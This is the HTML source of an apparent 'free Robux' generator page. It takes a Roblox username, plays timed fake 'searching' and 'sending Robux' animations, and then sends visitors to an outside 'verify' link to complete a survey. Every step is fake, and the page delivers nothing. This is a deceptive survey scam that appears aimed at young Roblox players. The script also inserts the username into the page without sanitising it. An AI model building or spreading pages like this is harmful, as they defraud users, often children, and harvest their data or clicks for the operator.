<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Get robux</title>

  <style>
    @import url("https://fonts.googleapis.com/css2?family=Kumbh+Sans:wght@520&family=Mochiy+Pop+One&family=Nunito:wght@200&family=Poppins:wght@400;600;700;900&family=REM:wght@300&family=Varela+Round&display=swap");

    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: "Kumbh Sans", sans-serif;
    }

    body {
      background-color: #181818;
      color: #fff;
    }

    .logo {
      width: 30px;
      display: flex;
      align-items: center;
    }

    .logo span {
      font-weight: 900;
      margin-right: 18px;
      font-size: 25px;
      color: #fff;
    }

    nav {
      width: 100%;
      display: flex;
      align-items: center;
      justify-content: space-between;
      background-color: #181818;
      border: solid #c7cbce;
      border-width: 0 0 1px;
      padding: 0 40px;
    }

    nav ul {
      list-style: none;
      display: flex;
    }

    img {
      width: 100%;
    }

    ul li {
      margin-left: 30px;
    }

    .para {
      width: 70%;
      margin: 20px auto;
      visibility: hidden;
    }

    .colum-con {
      background: #242424;
      padding: 14px;
      margin-top: 10px;
      display: flex;
      align-items: center;
      justify-content: space-around;
    }

    .column {
      display: flex;
      align-items: center;
    }

    .middle {
      width: 70%;
      margin: 0px auto;
      height: 168px;
      background-image: linear-gradient(0deg,
          rgba(39, 39, 46, 0.5),
          rgba(39, 39, 46, 0.5)),
        url(https://images.rbxcdn.com/9a75b1267d260322206e98bd256138d4-premium_title_bg.jpg);
      background-position: bottom;
      background-size: 100%;
      margin-bottom: 24px;
      color: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column;
      text-align: center;
    }

    .middle h2 {
      margin-bottom: 10px;
      font-size: 35px;
    }

    .middle p {
      font-size: 17px;
    }

    .box_con {
      margin: 0 auto;
      background-color: #242424;
      min-height: 163px;
      width: 70%;
      font-size: 20px;
      padding: 20px;
      border-radius: 5px;
    }

    input {
      padding: 12px 30px;
      border: none;
      background: #f2f4f5;
      border-radius: 9px;
      outline: none;
      font-size: 17px;
    }

    button {
      background: #00b06f;
      outline: none;
      border: none;
      color: #fff;
      padding: 9px 31px;
      border-radius: 5px;
      font-weight: 500;
      letter-spacing: 2px;
      font-size: 19px;
      cursor: pointer;
      margin-top: 30px;
    }

    .box2 {
      display: none;
    }

    .box3 {
      display: none;
    }

    .box4 {
      display: none;
    }

    .container {
      display: flex;
      flex-direction: column;

      border-radius: 8px;
    }

    .row {
      display: flex;
      align-items: center;
      height: 70px;
      justify-content: space-around;
      letter-spacing: 1px;
    }

    .row:not(.row:last-child) {
      border-bottom: 1px solid #bdbebe;
    }

    .price {
      font-size: 20px;
      font-weight: 700;
    }

    .robux_total {
      display: flex;
      align-items: center;
    }

    .pic {
      width: 30px;
      margin-right: 10px;
      pointer-events: none;
      margin-top: 2px;
    }

    span {
      font-size: 20px;
      font-weight: 800;
    }

    img {
      width: 100%;
    }

    h3 {
      font-size: 28px;
      margin-bottom: 2px;
      LETTER-SPACING: 2px;
    }

    .details {
      background-color: #00b06f;
      color: white;
      border-radius: 8px;
      padding: 5px 8px;
      width: 180px;
      display: flex;
      justify-content: center;
      cursor: pointer;
      transition: 0.3s;
    }

    .folding {
      margin: 20px auto;
      width: 100px;
      height: 100px;
      position: relative;
      transform: rotateZ(45deg);
    }

    .square {
      position: absolute;
      top: 36%;
      right: 35%;
      width: 30px;
      height: 30px;
      background-color: #333;
      transform: rotateZ(87deg);
    }

    .folding .sk-cube {
      float: left;
      width: 50%;
      height: 50%;
      position: relative;
      transform: scale(1.1);
    }

    .folding .sk-cube:before {
      content: "";
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: #fff;
      animation: sk-foldCubeAngle 2.4s infinite linear both;
      transform-origin: 100% 100%;
    }

    .folding .sk-cube2 {
      transform: scale(1.1) rotateZ(90deg);
    }

    .folding .sk-cube3 {
      transform: scale(1.1) rotateZ(180deg);
    }

    .folding .sk-cube4 {
      transform: scale(1.1) rotateZ(270deg);
    }

    .folding .sk-cube2:before {
      animation-delay: 0.3s;
    }

    .folding .sk-cube3:before {
      animation-delay: 0.6s;
    }

    .folding .sk-cube4:before {
      animation-delay: 0.9s;
    }

    @keyframes sk-foldCubeAngle {

      0%,
      10% {
        transform: perspective(140px) rotateX(-180deg);
        opacity: 0;
      }

      25%,
      75% {
        transform: perspective(140px) rotateX(0deg);
        opacity: 1;
      }

      90%,
      100% {
        transform: perspective(140px) rotateY(180deg);
        opacity: 0;
      }
    }

    @media (max-width: 400px) {
      nav {
        padding: 0 5px;
      }
    }

    @media (max-width: 1042px) {

      .middle,
      .box_con,
      .para {
        width: 90%;
      }
    }

    @media (max-width: 750px) {

      .middle,
      .box_con,
      .para {
        width: 100%;
      }

      .colum-con {
        flex-direction: column;
        align-items: flex-start;
      }

      .column {
        margin-bottom: 17px;
      }

      .para {
        width: 100%;
        VISIBILITY: hidden;
      }

      .middle h2 {
        margin-bottom: 10px;
        font-size: 30px;
      }

      .middle p {
        font-size: 13px;
      }
    }

    @media (max-width: 373px) {
      .logo span {
        display: none;
      }

      nav {
        padding: 0px;
      }
    }

    @media (max-width: 442px) {
      nav {
        padding: 0px 20px;
      }
    }

    @media (max-width: 396px) {
      nav {
        padding: 0px 10px;
      }
    }

    h4 {
      letter-spacing: 2px;
      font-weight: 500;
    }

    .text-container {
      color: white;
      background: #0abf0a;
      position: absolute;
      z-index: 9;
      height: 40px;
      width: -webkit-fill-available;
      margin: auto;
      text-align: center;
      display: flex;
      align-items: center;
      justify-content: center;
      font-family: monospace;
      font-weight: 900;
      font-size: 15px;
      opacity: 0;
    }
  </style>


<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>

<body>
  <div class="text-container" id="textContainer">
    #kira Claim 4000 Robux
  </div>
  <audio id="sound" src="https://archive.org/download/win-3_202412/win%20%283%29.mpeg" preload="auto"></audio>
  <nav>

    <div class="logo">
      <span>&#9776;</span>
      <img src="https://media0.giphy.com/media/v1.Y2lkPTc5MGI3NjExY3N0cWlyZG83amlvcXVnOXMxNGRjOHJyNXFmbjB3Nnk1NXc4cDFkNSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9cw/1QcqLUCuQca1edQ0rK/giphy.webp" alt="">
    </div>
    <ul>
      <li>Robux</li>
    </ul>
  </nav>

  <div class="middle">
    <h2>Get Robux</h2>
    <p>Robux allows you to purchase upgrades for your avatar or buy special abilities in experiences.</p>
  </div>

  <div class="box_con">
    <div class="box">
      <h3>• Roblox username</h3><br>
      <input class="username" type="text" name="" placeholder="Enter your username..."><br>
      <button class="getrbx">Next</button>
    </div>
    <div class="box2">
      <div class="folding">
        <div class="sk-cube1 sk-cube"></div>
        <div class="sk-cube2 sk-cube"></div>
        <div class="sk-cube4 sk-cube"></div>
        <div class="sk-cube3 sk-cube"></div>
        <div class="square"></div>
      </div>
      <p class="useroutput" style="text-align: center; margin-top: 30px;">searching for amjad ...</p>
    </div>
    <div class="box3">
      <div class="container">
        <div class="row">
          <div class="price">$0.00</div>
          <div class="details">
            <div class="robux_total">
              <div class="pic"><img src="https://d39fkvblvwpxa1.cloudfront.net/uploads/1737700441f54cda29360d16d1cb0f02e0e32ee181.png"></div><span>500</span>
            </div>
          </div>
        </div>
        <div class="row">

          <div class="price">$0.00</div>
          <div class="details">
            <div class="robux_total">
              <div class="pic"><img src="https://d39fkvblvwpxa1.cloudfront.net/uploads/1737700441f54cda29360d16d1cb0f02e0e32ee181.png"></div><span>1000</span>
            </div>
          </div>
        </div>
        <div class="row">

          <div class="price">$0.00</div>
          <div class="details">
            <div class="robux_total">
              <div class="pic"><img src="https://d39fkvblvwpxa1.cloudfront.net/uploads/1737700441f54cda29360d16d1cb0f02e0e32ee181.png"></div>
              <span>4000</span>
            </div>
          </div>
        </div>
        <div class="row">

          <div class="price">$0.00</div>
          <div class="details">
            <div class="robux_total">
              <div class="pic"><img src="https://d39fkvblvwpxa1.cloudfront.net/uploads/1737700441f54cda29360d16d1cb0f02e0e32ee181.png"></div><span>10,000</span>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="box4">
            <h3>Final step!</h3>
            <p>Please click verify that you are not a robot & just complete survey email ✅</p>
            <button dir="rtl" style="background-color: #00b06f; font-size: 19px;" 
        onclick="window.location.href='https://www.aiappls.com/robuxverify.html'">
    Verify
</button>
        </div>
    </div>
    <div class="para">
        
        <div class="colum-con">
            <div class="column">
                <div class="image" style="width: 45px;">
                    <img src="sara1.png" alt="">
                </div>
                <div>
            </div>
            <div class="column">
                <div class="image" style="width: 45px;">
                    <img src="samue.png" alt="">
                </div>
                <div>
                 
                </div>
            </div>
        </div>
    </div>
    
    <script>
const rbxbtn = document.querySelector(".getrbx");

const box1 = document.querySelector(".box");
const box2 = document.querySelector(".box2");
const box3 = document.querySelector(".box3");
const box4 = document.querySelector(".box4");
const rbxtotal = document.querySelectorAll(".details");

const username = document.querySelector(".username");

const useroutput = document.querySelector(".useroutput");

rbxbtn.addEventListener("click", () => {
  if (username.value.length <= 2) {
    alert("please enter username");
  } else {
    box1.style.display = "none";
    box2.style.display = "block";
    setTimeout(showbox2, 4500);
    setTimeout(showbox3, 4500);
  }

  useroutput.innerHTML = `Searching for <b>${username.value}</b> ...`;
});

rbxtotal.forEach((btn) => {
  btn.addEventListener("click", () => {
    box3.style.display = "none";

    box2.style.display = "block";

    setTimeout(showboxagain, 2500);
    setTimeout(showbox4, 2500);
    useroutput.innerHTML = `Sending Robux to <b>${username.value}</b>...`;
  });
});

let showboxagain = () => {
  box2.style.display = "none";
};
let showbox2 = () => {
  box2.style.display = "none";
};

let showbox3 = () => {
  box3.style.display = "block";
};

let showbox4 = () => {
  box4.style.display = "block";
};

    </script>
</body>

  </html>
